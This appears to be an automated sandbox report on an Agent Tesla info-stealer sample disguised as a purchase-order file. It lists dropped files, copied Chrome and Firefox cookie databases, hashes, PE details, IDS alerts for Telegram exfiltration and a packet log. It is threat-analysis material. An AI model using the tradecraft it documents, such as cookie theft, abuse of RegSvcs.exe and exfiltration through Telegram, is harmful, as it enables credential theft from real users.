SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Roaming\54jrhssx.hnx\Chrome\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\54jrhssx.hnx\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: m30zZYga23.exe, Detection: malicious, Browse Filename: RFQ.exe, Detection: malicious, Browse Filename: AWB#150332.exe, Detection: malicious, Browse Filename: SOA_9828392091.exe, Detection: malicious, Browse Filename: ngPebbPhbp.exe, Detection: malicious, Browse Filename: Pi648je050.exe, Detection: malicious, Browse Filename: shipping documents.exe, Detection: malicious, Browse Filename: Termination_List_November_2024_pdf.exe, Detection: malicious, Browse Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious, Browse Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465619282713566
Encrypted:	false
SSDEEP:	6144:lIXfpi67eLPU9skLmb0b4MWSPKaJG8nAgejZMMhA2gX4WABl0uNKdwBCswSbd:GXD94MWlLZMM6YFH0+d
MD5:	D934880A3CDFD6E462FF70D932ECE3CF
SHA1:	049151548B3B3700E0845F0F7F207EC55836ACCC
SHA-256:	2C8BD2494F06251420CAAA34CD0E8B445CCB486DAE04179E292F16DFF45CD8D9
SHA-512:	CB7E9101B054B600180D582BC8804BCBD86EC8C0F0E074ABD78A2EE7C704B5FF3D293EC561573F905862C910A711791DB3A046D2A382ECAA658B25122B1F84AB
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2$.n.G.................................................................................................................................................................................................................................................................................................................................................Z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.996507179094833
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	PO54782322024.exe
File size:	528'896 bytes
MD5:	5dc11c53470282ca41404226ead4eccd
SHA1:	dc93ee506654c5fd14a6c0c851609e1d5aa7ac52
SHA256:	676869eec66690665e5a88c85636f738ad095b408973787420c3a1472b5bd482
SHA512:	e46f9cad869694d3e1da785a3ca3829e7177e70d35bad2abd7d30dbdb95d3f7f6138e6e523d8524a915d4fba38c00dd36707ccf4eabe0d95c8b74a356d6f3607
SSDEEP:	12288:gGm6FeaFQEfSguIZ12JxgvMD4RfCIcNVrHqPZt5:5eqsjIiFD4Re9Kxz
TLSH:	3AB42304CED5D062C39D87F20C6357C62475D28388B1DEEE66989F90E210F9AE9F72E5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...R.Pg.........."...0.l................ ....@...... .......................@............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67508452 [Wed Dec 4 16:33:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x7f368	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1b6c	0x1c00	e7128aeddd6621e4dceb81f36e883de4	False	0.6279296875	data	5.942798791059208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x7f368	0x7f400	3f8021ed1bc16f215c1b2cbddf8b08ff	False	0.9990080887770137	data	7.999404607550849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
M4LWARE	0x4110	0x7ee18	data	1.0003194125887043
RT_VERSION	0x82f28	0x254	data	0.45805369127516776
RT_MANIFEST	0x8317c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T05:51:00.581471+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49732	149.154.167.220	443	TCP
2024-12-06T05:51:00.581471+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49732	149.154.167.220	443	TCP
2024-12-06T05:51:00.831670+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49732	TCP
2024-12-06T05:51:02.936121+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49734	149.154.167.220	443	TCP
2024-12-06T05:51:03.684238+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49734	TCP
2024-12-06T05:52:28.583138+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49818	149.154.167.220	443	TCP
2024-12-06T05:52:28.772328+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49817	149.154.167.220	443	TCP
2024-12-06T05:52:28.772328+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49817	149.154.167.220	443	TCP
2024-12-06T05:52:29.005002+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49817	TCP
2024-12-06T05:52:40.926692+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49849	149.154.167.220	443	TCP
2024-12-06T05:52:46.661125+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49861	149.154.167.220	443	TCP
2024-12-06T05:52:54.442325+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49882	149.154.167.220	443	TCP
2024-12-06T05:53:05.473843+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49909	149.154.167.220	443	TCP
2024-12-06T05:53:06.645593+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49915	149.154.167.220	443	TCP
2024-12-06T05:53:08.911100+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49921	149.154.167.220	443	TCP
2024-12-06T05:53:21.770591+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49948	149.154.167.220	443	TCP
2024-12-06T05:53:29.180396+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49968	149.154.167.220	443	TCP
2024-12-06T05:53:30.536070+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49969	149.154.167.220	443	TCP
2024-12-06T05:53:42.317431+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50000	149.154.167.220	443	TCP
2024-12-06T05:53:45.155874+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50006	149.154.167.220	443	TCP
2024-12-06T05:54:13.020937+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50028	149.154.167.220	443	TCP
2024-12-06T05:54:19.802464+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50029	149.154.167.220	443	TCP
2024-12-06T05:54:24.505235+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50030	149.154.167.220	443	TCP
2024-12-06T05:54:31.745983+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50031	149.154.167.220	443	TCP
2024-12-06T05:54:34.114569+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50032	149.154.167.220	443	TCP
2024-12-06T05:54:39.286315+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50034	149.154.167.220	443	TCP
2024-12-06T05:54:55.304892+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50035	149.154.167.220	443	TCP
2024-12-06T05:55:02.124151+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	50036	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 05:50:56.317807913 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:56.317838907 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:56.317919016 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:56.326634884 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:56.326647997 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.543462038 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.543600082 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:57.545839071 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:57.545845985 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.546056986 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.597704887 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:57.598145962 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:57.643328905 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.982675076 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.982721090 CET	443	49730	172.67.74.152	192.168.2.4
Dec 6, 2024 05:50:57.982774019 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:57.989160061 CET	49730	443	192.168.2.4	172.67.74.152
Dec 6, 2024 05:50:58.593467951 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:50:58.593511105 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:50:58.593626022 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:50:58.593936920 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:50:58.593952894 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:50:59.960396051 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:50:59.960474014 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:50:59.975923061 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:50:59.975939989 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:50:59.976146936 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:50:59.984756947 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.027337074 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.332951069 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.332973957 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.581479073 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.628961086 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.830986977 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.831394911 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.831439972 CET	443	49732	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.831489086 CET	49732	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.882697105 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.882725954 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:00.882802010 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.883018970 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:00.883030891 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.311619997 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.311681986 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:02.312839985 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:02.312848091 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.313071966 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.319504976 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:02.367331982 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.678054094 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:02.678092957 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.936125994 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:02.988331079 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:03.683883905 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:03.684148073 CET	443	49734	149.154.167.220	192.168.2.4
Dec 6, 2024 05:51:03.684206963 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:51:03.684638023 CET	49734	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.779385090 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.779422998 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:26.779567003 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.783598900 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.783611059 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:26.839596033 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.839631081 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:26.839746952 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.840229988 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:26.840244055 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.147039890 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.158091068 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.158117056 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.228877068 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.230529070 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.230547905 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.504375935 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.504401922 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.582762957 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.582793951 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.582932949 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.582947016 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.583086014 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.583100080 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.772353888 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.816709042 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:28.851726055 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:28.895608902 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:29.004770994 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:29.004903078 CET	443	49817	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:29.007647991 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:29.008013010 CET	49817	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:29.495659113 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:29.498116970 CET	443	49818	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:29.498249054 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:29.499598980 CET	49818	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:39.205630064 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:39.205652952 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:39.205867052 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:39.206159115 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:39.206176996 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:40.568032980 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:40.569459915 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:40.569482088 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:40.926265955 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:40.926295996 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:40.926450014 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:40.926470041 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:40.926632881 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:40.926647902 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:41.191335917 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:41.238569975 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:41.847719908 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:41.847789049 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:41.848517895 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:41.848560095 CET	443	49849	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:41.848608017 CET	49849	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:44.937720060 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:44.937777042 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:44.937916040 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:44.938309908 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:44.938323975 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.311619997 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.311698914 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.313517094 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.313533068 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.313762903 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.315048933 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.355341911 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.660715103 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.660748959 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.660907984 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.660928011 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.661034107 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:46.661053896 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:46.973123074 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:47.035464048 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:47.616801977 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:47.617047071 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:47.617664099 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:47.617702007 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:47.617863894 CET	443	49861	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:47.617938042 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:47.617938042 CET	49861	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.197423935 CET	49881	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.197453022 CET	443	49881	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:52.197540998 CET	49881	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.197889090 CET	49881	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.197900057 CET	443	49881	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:52.686364889 CET	49882	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.686414003 CET	443	49882	149.154.167.220	192.168.2.4
Dec 6, 2024 05:52:52.686572075 CET	49882	443	192.168.2.4	149.154.167.220
Dec 6, 2024 05:52:52.690125942 CET	49882	443	192.168.2.4	149.154.167.220
